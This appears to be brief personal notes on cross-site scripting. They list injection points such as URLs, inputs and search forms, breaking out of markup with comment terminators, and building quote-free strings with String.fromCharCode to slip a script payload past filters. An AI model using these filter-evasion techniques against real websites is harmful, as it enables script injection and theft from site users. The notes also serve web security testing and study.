- the url
- an injectable
<input .../>
- or a form input, find functions on certain websites are very exploitable
Try to break the webpage with '-->', e.g. html comment termination,
inject your payload, e.g. <script>...</script>
Escaping double and single quotes:
a.
(new String(1)).replace((new Number(1)).toString(10), /look no single or double quotes/);
b.
String.fromCharCode(n1, n2, ..., nX)
c. replace (for compression)
Use this python snippet to prepare the payload:
[ ord(c) for c in "http://payload_in_decimal" ]
The drawback of this technique is that the decimal payload will be huge and it might overflow the input, i.e. url input on the browser, input-tag, form etc.